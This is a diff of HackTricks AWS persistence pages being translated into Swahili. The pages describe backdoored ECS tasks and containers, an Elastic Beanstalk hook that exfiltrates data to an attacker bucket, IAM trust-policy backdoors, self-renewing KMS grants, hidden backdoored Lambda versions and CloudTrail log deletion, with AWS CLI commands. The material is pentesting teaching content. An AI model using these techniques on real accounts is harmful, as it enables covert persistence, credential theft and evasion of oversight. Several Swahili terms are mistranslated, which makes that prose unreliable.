- --policy-text file:///tmp/my-policy.json
+--repository-name cluster-autoscaler \
+--policy-text file:///tmp/my-policy.json
# With a .json such as
{
- "Version" : "2008-10-17",
- "Statement" : [
- {
- "Sid" : "allow public pull",
- "Effect" : "Allow",
- "Principal" : "*",
- "Action" : [
- "ecr:BatchCheckLayerAvailability",
- "ecr:BatchGetImage",
- "ecr:GetDownloadUrlForLayer"
- ]
- }
- ]
+"Version" : "2008-10-17",
+"Statement" : [
+{
+"Sid" : "allow public pull",
+"Effect" : "Allow",
+"Principal" : "*",
+"Action" : [
+"ecr:BatchCheckLayerAvailability",
+"ecr:BatchGetImage",
+"ecr:GetDownloadUrlForLayer"
+]
+}
+]
}
```
-
> [!WARNING]
-> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
+> Kumbuka kwamba ECR inahitaji watumiaji kuwa na **ruhusa** ya kufanya simu kwa **`ecr:GetAuthorizationToken`** API kupitia sera ya IAM **kabla ya kuweza kuthibitisha** kwenye rejista na kusukuma au kuvuta picha yoyote kutoka kwenye hifadhi yoyote ya Amazon ECR.
-### Registry Policy & Cross-account Replication
+### Sera ya Rejista & Urejeleaji wa Makaratasi Mbalimbali
-It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
+Inawezekana kurejeleza moja kwa moja rejista katika akaunti ya nje kwa kuunda urejeleaji wa makaratasi mbalimbali, ambapo unahitaji **kuashiria akaunti ya nje** ambapo unataka kurejeleza rejista hiyo.
-First, you need to give the external account access over the registry with a **registry policy** like:
-
+Kwanza, unahitaji kutoa akaunti ya nje ufikiaji juu ya rejista kwa kutumia **sera ya rejista** kama:
```bash
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
{
- "Sid": "asdasd",
- "Effect": "Allow",
- "Principal": {
- "AWS": "arn:aws:iam::947247140022:root"
- },
- "Action": [
- "ecr:CreateRepository",
- "ecr:ReplicateImage"
- ],
- "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
+"Sid": "asdasd",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::947247140022:root"
+},
+"Action": [
+"ecr:CreateRepository",
+"ecr:ReplicateImage"
+],
+"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
```
-
-Then apply the replication config:
-
+Kisha tumia usanidi wa nakala:
```bash
aws ecr put-replication-configuration \
- --replication-configuration file://replication-settings.json \
- --region us-west-2
+--replication-configuration file://replication-settings.json \
+--region us-west-2
# Having the .json a content such as:
{
- "rules": [{
- "destinations": [{
- "region": "destination_region",
- "registryId": "destination_accountId"
- }],
- "repositoryFilters": [{
- "filter": "repository_prefix_name",
- "filterType": "PREFIX_MATCH"
- }]
- }]
+"rules": [{
+"destinations": [{
+"region": "destination_region",
+"registryId": "destination_accountId"
+}],
+"repositoryFilters": [{
+"filter": "repository_prefix_name",
+"filterType": "PREFIX_MATCH"
+}]
+}]
}
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
index 988626c8f..79af6532b 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
@@ -4,29 +4,28 @@
## ECS
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-ecs-enum.md
{{#endref}}
-### Hidden Periodic ECS Task
+### Kazi ya ECS ya Kila Wakati Isiyoonekana
> [!NOTE]
> TODO: Test
-An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
-
+Mshambuliaji anaweza kuunda kazi ya ECS ya kila wakati isiyoonekana kwa kutumia Amazon EventBridge ili **kuweka ratiba ya utekelezaji wa kazi mbaya kila wakati**. Kazi hii inaweza kufanya upelelezi, kuhamasisha data, au kudumisha kudumu katika akaunti ya AWS.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
- {
- "name": "malicious-container",
- "image": "malicious-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": true
- }
+{
+"name": "malicious-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+}
]'
# Create an Amazon EventBridge rule to trigger the task periodically
@@ -34,70 +33,61 @@ aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate
# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
- {
- "Id": "malicious-ecs-task-target",
- "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
- "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
- "EcsParameters": {
- "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
- "TaskCount": 1
- }
- }
+{
+"Id": "malicious-ecs-task-target",
+"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
+"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
+"EcsParameters": {
+"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
+"TaskCount": 1
+}
+}
]'
```
-
-### Backdoor Container in Existing ECS Task Definition
+### Backdoor Container katika Mwelekeo wa Kazi wa ECS uliopo
> [!NOTE]
> TODO: Test
-An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities.
-
+Mshambuliaji anaweza kuongeza **container ya nyuma isiyoonekana** katika mwelekeo wa kazi wa ECS uliopo ambayo inafanya kazi pamoja na container halali. Container ya nyuma inaweza kutumika kwa kudumu na kutekeleza shughuli mbaya.
```bash
# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
- {
- "name": "legitimate-container",
- "image": "legitimate-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": true
- },
- {
- "name": "backdoor-container",
- "image": "malicious-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": false
- }
+{
+"name": "legitimate-container",
+"image": "legitimate-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+},
+{
+"name": "backdoor-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": false
+}
]'
```
-
-### Undocumented ECS Service
+### Huduma ya ECS Isiyoandikwa
> [!NOTE]
> TODO: Test
-An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
-
+Mshambuliaji anaweza kuunda **huduma ya ECS isiyoandikwa** inayokimbiza kazi mbaya. Kwa kuweka idadi inayotakiwa ya kazi kuwa ya chini na kuzima uandishi wa kumbukumbu, inakuwa vigumu kwa wasimamizi kugundua huduma hiyo mbaya.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
- {
- "name": "malicious-container",
- "image": "malicious-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": true
- }
+{
+"name": "malicious-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+}
]'
# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
index bdb282d41..766af8e29 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
@@ -4,22 +4,18 @@
## EFS
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-efs-enum.md
{{#endref}}
-### Modify Resource Policy / Security Groups
+### Badilisha Sera ya Rasilimali / Vikundi vya Usalama
-Modifying the **resource policy and/or security groups** you can try to persist your access into the file system.
+Kwa kubadilisha **sera ya rasilimali na/v au vikundi vya usalama** unaweza kujaribu kudumisha ufikiaji wako kwenye mfumo wa faili.
-### Create Access Point
+### Unda Kituo cha Ufikiaji
-You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system.
+Unaweza **kuunda kituo cha ufikiaji** (ikiwa na ufikiaji wa mzizi kwa `/`) kinachoweza kufikiwa kutoka kwa huduma ambapo umeanzisha **muhimu nyingine** ili kudumisha ufikiaji wa kijasiri kwenye mfumo wa faili.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
index c55e0e2ba..0388e3ec8 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
@@ -4,7 +4,7 @@
## Elastic Beanstalk
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-elastic-beanstalk-enum.md
@@ -12,23 +12,22 @@ For more information check:
### Persistence in Instance
-In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**.
+Ili kudumisha uendelevu ndani ya akaunti ya AWS, **mekanismu ya uendelevu inaweza kuanzishwa ndani ya instance** (kazi ya cron, ufunguo wa ssh...) ili mshambuliaji aweze kuipata na kuiba **credentials za IAM role kutoka kwa huduma ya metadata**.
### Backdoor in Version
-An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.
+Mshambuliaji anaweza kuweka backdoor kwenye msimbo ndani ya repo ya S3 ili kila wakati ifanye backdoor yake na msimbo unaotarajiwa.
### New backdoored version
-Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.
+Badala ya kubadilisha msimbo kwenye toleo halisi, mshambuliaji anaweza kupeleka toleo jipya lililo na backdoor la programu.
### Abusing Custom Resource Lifecycle Hooks
> [!NOTE]
> TODO: Test
-Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
-
+Elastic Beanstalk inatoa mizunguko ya maisha ambayo inakuruhusu kuendesha skripti za kawaida wakati wa upatikanaji na kumalizika kwa instance. Mshambuliaji anaweza **kuweka mzunguko wa maisha ili kwa muda fulani kuendesha skripti inayotoa data au kudumisha ufikiaji wa akaunti ya AWS**.
```bash
bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
@@ -42,40 +41,35 @@ aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hoo
# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
- AWSEBAutoScalingGroup:
- Metadata:
- AWS::ElasticBeanstalk::Ext:
- TriggerConfiguration:
- triggers:
- - name: stealthy-lifecycle-hook
- events:
- - "autoscaling:EC2_INSTANCE_LAUNCH"
- - "autoscaling:EC2_INSTANCE_TERMINATE"
- target:
- ref: "AWS::ElasticBeanstalk::Environment"
- arn:
- Fn::GetAtt:
- - "AWS::ElasticBeanstalk::Environment"
- - "Arn"
- stealthyLifecycleHook:
- Type: AWS::AutoScaling::LifecycleHook
- Properties:
- AutoScalingGroupName:
- Ref: AWSEBAutoScalingGroup
- LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
- NotificationTargetARN:
- Ref: stealthy-lifecycle-hook
- RoleARN:
- Fn::GetAtt:
- - AWSEBAutoScalingGroup
- - Arn' > stealthy_lifecycle_hook.yaml
+AWSEBAutoScalingGroup:
+Metadata:
+AWS::ElasticBeanstalk::Ext:
+TriggerConfiguration:
+triggers:
+- name: stealthy-lifecycle-hook
+events:
+- "autoscaling:EC2_INSTANCE_LAUNCH"
+- "autoscaling:EC2_INSTANCE_TERMINATE"
+target:
+ref: "AWS::ElasticBeanstalk::Environment"
+arn:
+Fn::GetAtt:
+- "AWS::ElasticBeanstalk::Environment"
+- "Arn"
+stealthyLifecycleHook:
+Type: AWS::AutoScaling::LifecycleHook
+Properties:
+AutoScalingGroupName:
+Ref: AWSEBAutoScalingGroup
+LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
+NotificationTargetARN:
+Ref: stealthy-lifecycle-hook
+RoleARN:
+Fn::GetAtt:
+- AWSEBAutoScalingGroup
+- Arn' > stealthy_lifecycle_hook.yaml
# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
index e3e1944e7..1b490f61b 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
@@ -4,50 +4,44 @@
## IAM
-For more information access:
+Kwa maelezo zaidi tembelea:
{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}
-### Common IAM Persistence
+### Uthibitishaji wa IAM wa Kawaida
-- Create a user
-- Add a controlled user to a privileged group
-- Create access keys (of the new user or of all users)
-- Grant extra permissions to controlled users/groups (attached policies or inline policies)
-- Disable MFA / Add you own MFA device
-- Create a Role Chain Juggling situation (more on this below in STS persistence)
+- Unda mtumiaji
+- Ongeza mtumiaji anayedhibitiwa kwenye kundi lenye mamlaka
+- Unda funguo za ufikiaji (za mtumiaji mpya au za watumiaji wote)
+- Toa ruhusa za ziada kwa watumiaji/vikundi vilivyo na udhibiti (sera zilizounganishwa au sera za ndani)
+- Zima MFA / Ongeza kifaa chako cha MFA
+- Unda hali ya Mnyororo wa Jukumu (zaidi kuhusu hii hapa chini katika uthibitishaji wa STS)
-### Backdoor Role Trust Policies
-
-You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone):
+### Sera za Kuamini Jukumu la Backdoor
+Unaweza kuingiza backdoor kwenye sera ya kuamini ili uweze kuichukua kwa rasilimali ya nje inayodhibitiwa na wewe (au kwa kila mtu):
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "AWS": ["*", "arn:aws:iam::123213123123:root"]
- },
- "Action": "sts:AssumeRole"
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": ["*", "arn:aws:iam::123213123123:root"]
+},
+"Action": "sts:AssumeRole"
+}
+]
}
```
+### Sera ya Backdoor
-### Backdoor Policy Version
+Patia ruhusa za Msimamizi sera katika toleo lake si la mwisho (toleo la mwisho linapaswa kuonekana halali), kisha piga hiyo sera kwa mtumiaji/jeshi lililodhibitiwa.
-Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group.
+### Backdoor / Unda Mtoa Kitambulisho
-### Backdoor / Create Identity Provider
-
-If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them.
+Ikiwa akaunti tayari inatumia mtoa kitambulisho wa kawaida (kama Github) masharti ya uaminifu yanaweza kuongezwa ili mshambuliaji aweze kuyatumia.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
index 7aefbd410..cc64ee43f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
@@ -4,40 +4,34 @@
## KMS
-For mor information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-kms-enum.md
{{#endref}}
-### Grant acces via KMS policies
+### Toa ufikiaji kupitia sera za KMS
-An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information.
+Mshambuliaji anaweza kutumia ruhusa **`kms:PutKeyPolicy`** ili **kutoa ufikiaji** kwa funguo kwa mtumiaji chini ya udhibiti wake au hata kwa akaunti ya nje. Angalia [**ukurasa wa KMS Privesc**](../aws-privilege-escalation/aws-kms-privesc.md) kwa maelezo zaidi.
### Eternal Grant
-Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key.
+Mikopo ni njia nyingine ya kutoa ruhusa kwa kiongozi juu ya funguo maalum. Inawezekana kutoa mkopo unaomruhusu mtumiaji kuunda mikopo. Zaidi ya hayo, mtumiaji anaweza kuwa na mikopo kadhaa (hata sawa) juu ya funguo hiyo hiyo.
-Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated.
-
-(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant)
+Hivyo, inawezekana kwa mtumiaji kuwa na mikopo 10 yenye ruhusa zote. Mshambuliaji anapaswa kufuatilia hili mara kwa mara. Na ikiwa kwa wakati fulani mkopo 1 utaondolewa, mingine 10 inapaswa kuundwa.
+(Tunatumia 10 na si 2 ili kuweza kugundua kwamba mkopo umeondolewa wakati mtumiaji bado ana mkopo fulani)
```bash
# To generate grants, generate 10 like this one
aws kms create-grant \
- --key-id \
- --grantee-principal \
- --operations "CreateGrant" "Decrypt"
+--key-id \
+--grantee-principal \
+--operations "CreateGrant" "Decrypt"
# To monitor grants
aws kms list-grants --key-id
```
-
> [!NOTE]
-> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
+> Utoaji unaweza kutoa ruhusa tu kutoka hapa: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
index 1390c2d55..479a3bbd2 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
@@ -4,7 +4,7 @@
## Lambda
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../../aws-services/aws-lambda-enum.md
@@ -12,7 +12,7 @@ For more information check:
### Lambda Layer Persistence
-It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way:
+Inawezekana **kuanzisha/backdoor layer ili kutekeleza msimbo wowote** wakati lambda inatekelezwa kwa njia ya siri:
{{#ref}}
aws-lambda-layers-persistence.md
@@ -20,49 +20,45 @@ aws-lambda-layers-persistence.md
### Lambda Extension Persistence
-Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
+Kwa kutumia Lambda Layers inawezekana pia kutumia extensions na kudumu katika lambda lakini pia kuiba na kubadilisha maombi.
{{#ref}}
aws-abusing-lambda-extensions.md
{{#endref}}
-### Via resource policies
+### Kupitia sera za rasilimali
-It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts:
+Inawezekana kutoa ufikiaji kwa vitendo tofauti vya lambda (kama vile kuita au kuboresha msimbo) kwa akaunti za nje:
-### Versions, Aliases & Weights
+### Matoleo, Majina Mbadala & Uzito
-A Lambda can have **different versions** (with different code each version).\
-Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\
-This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth.
+Lambda inaweza kuwa na **matoleo tofauti** (ikiwa na msimbo tofauti kila toleo).\
+Kisha, unaweza kuunda **majina mbadala tofauti na matoleo tofauti** ya lambda na kuweka uzito tofauti kwa kila moja.\
+Hivi ndivyo mshambuliaji anaweza kuunda **toleo la backdoored 1** na **toleo la 2 lenye msimbo halali tu** na **kutekeleza toleo la 1 tu katika 1%** ya maombi ili kubaki kwa siri.
-### Version Backdoor + API Gateway
+### Toleo la Backdoor + API Gateway
-1. Copy the original code of the Lambda
-2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
- 1. Call the API gateway related to the lambda to execute the code
-3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
- 1. This will hide the backdoored code in a previous version
-4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1`
- 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario).
-5. Select the POST method created and in Actions select **`Deploy API`**
-6. Now, when you **call the function via POST your Backdoor** will be invoked
+1. Nakili msimbo wa asili wa Lambda
+2. **Unda toleo jipya la backdooring** msimbo wa asili (au tu na msimbo mbaya). Chapisha na **peleka toleo hilo** kwa $LATEST
+1. Piga simu kwa API gateway inayohusiana na lambda ili kutekeleza msimbo
+3. **Unda toleo jipya lenye msimbo wa asili**, Chapisha na peleka **toleo hilo** kwa $LATEST.
+1. Hii itaficha msimbo wa backdoored katika toleo la awali
+4. Nenda kwa API Gateway na **unda njia mpya ya POST** (au chagua njia nyingine yoyote) ambayo itatekeleza toleo la backdoored la lambda: `arn:aws:lambda:us-east-1::function::1`
+1. Kumbuka mwisho :1 ya arn **ikiashiria toleo la kazi** (toleo 1 litakuwa la backdoored katika hali hii).
+5. Chagua njia ya POST iliyoundwa na katika Vitendo chagua **`Deploy API`**
+6. Sasa, unapofanya **kuita kazi kupitia POST Backdoor yako** itaitwa
### Cron/Event actuator
-The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\
-Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**.
+Hali kwamba unaweza kufanya **kazi za lambda zifanye kazi wakati kitu kinatokea au wakati muda unapita** inafanya lambda kuwa njia nzuri na ya kawaida ya kupata kudumu na kuepuka kugunduliwa.\
+Hapa kuna mawazo kadhaa ya kufanya **uwepo wako katika AWS uwe wa siri zaidi kwa kuunda lambdas**.
-- Every time a new user is created lambda generates a new user key and send it to the attacker.
-- Every time a new role is created lambda gives assume role permissions to compromised users.
-- Every time new cloudtrail logs are generated, delete/alter them
+- Kila wakati mtumiaji mpya anapoundwa lambda inaunda ufunguo mpya wa mtumiaji na kuutuma kwa mshambuliaji.
+- Kila wakati jukumu jipya linapoundwa lambda inatoa ruhusa za kudhani jukumu kwa watumiaji waliokumbwa.
+- Kila wakati kumbukumbu mpya za cloudtrail zinapoundwa, futa/badilisha hizo.
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
index 71655ada0..09a09f417 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
@@ -4,35 +4,35 @@
## Lambda Extensions
-Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
+Lambda extensions huongeza kazi kwa kuunganishwa na zana mbalimbali za **monitoring, observability, security, na governance**. Extensions hizi, zinazoongezwa kupitia [.zip archives kwa kutumia Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) au kujumuishwa katika [mifano ya picha za kontena](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), zinafanya kazi katika njia mbili: **internal** na **external**.
-- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
-- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
+- **Internal extensions** huunganishwa na mchakato wa runtime, zikibadilisha uzinduzi wake kwa kutumia **language-specific environment variables** na **wrapper scripts**. Uboreshaji huu unatumika kwa aina mbalimbali za runtimes, ikiwa ni pamoja na **Java Correto 8 na 11, Node.js 10 na 12, na .NET Core 3.1**.
+- **External extensions** zinafanya kazi kama michakato tofauti, zikihakikisha uendeshaji unalingana na mzunguko wa maisha wa kazi ya Lambda. Zinapatikana kwa runtimes mbalimbali kama **Node.js 10 na 12, Python 3.7 na 3.8, Ruby 2.5 na 2.7, Java Corretto 8 na 11, .NET Core 3.1**, na **custom runtimes**.
-For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
+Kwa maelezo zaidi kuhusu [**jinsi lambda extensions zinavyofanya kazi angalia docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
### External Extension for Persistence, Stealing Requests & modifying Requests
-This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
+Hii ni muhtasari wa mbinu iliyopendekezwa katika chapisho hili: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
-It was found that the default Linux kernel in the Lambda runtime environment is compiled with ā**process_vm_readv**ā and ā**process_vm_writev**ā system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapidās heap memory, by design.**
+Ilipatikana kuwa kernel ya Linux ya default katika mazingira ya runtime ya Lambda imeandikwa kwa ā**process_vm_readv**ā na ā**process_vm_writev**ā system calls. Na michakato yote inafanya kazi na kitambulisho sawa cha mtumiaji, hata mchakato mpya ulioanzishwa kwa ajili ya external extension. **Hii inamaanisha kuwa external extension ina ufikiaji kamili wa kusoma na kuandika kwenye kumbukumbu ya Rapid, kwa muundo.**
-Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request.
+Zaidi ya hayo, ingawa Lambda extensions zina uwezo wa **kujiandikisha kwa matukio ya mwito**, AWS haifunui data halisi kwa extensions hizi. Hii inahakikisha kuwa **extensions haziwezi kufikia taarifa nyeti** zinazotumwa kupitia ombi la HTTP.
-The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid.
+Mchakato wa Init (Rapid) unafuatilia maombi yote ya API katika [http://127.0.0.1:9001](http://127.0.0.1:9001/) wakati Lambda extensions zinaanzishwa na kuendesha kabla ya utekelezaji wa msimbo wowote wa runtime, lakini baada ya Rapid.
-The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions.
+Kigezo **`AWS_LAMBDA_RUNTIME_API`** kinaonyesha **IP** anwani na **nambari** ya **port** ya Rapid API kwa **michakato ya runtime ya watoto** na extensions za ziada.
> [!WARNING]
-> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number.
+> Kwa kubadilisha kigezo cha mazingira **`AWS_LAMBDA_RUNTIME_API`** kuwa **`port`** tunayo, inawezekana kukamata vitendo vyote ndani ya runtime ya Lambda (**man-in-the-middle**). Hii inawezekana kwa sababu extension inafanya kazi na ruhusa sawa na Rapid Init, na kernel ya mfumo inaruhusu **kubadilisha kumbukumbu ya mchakato**, ikiruhusu kubadilisha nambari ya port.
-Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment.
+Kwa sababu **extensions zinafanya kazi kabla ya msimbo wowote wa runtime**, kubadilisha kigezo cha mazingira kutakuwa na athari kwenye mchakato wa runtime (mfano, Python, Java, Node, Ruby) unapoanza. Zaidi ya hayo, **extensions zilizopakiwa baada** yetu, ambazo zinategemea kigezo hiki, pia zitaelekeza kupitia extension yetu. Mpangilio huu unaweza kuwezesha malware kupita kabisa hatua za usalama au logging extensions moja kwa moja ndani ya mazingira ya runtime.
-The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**.
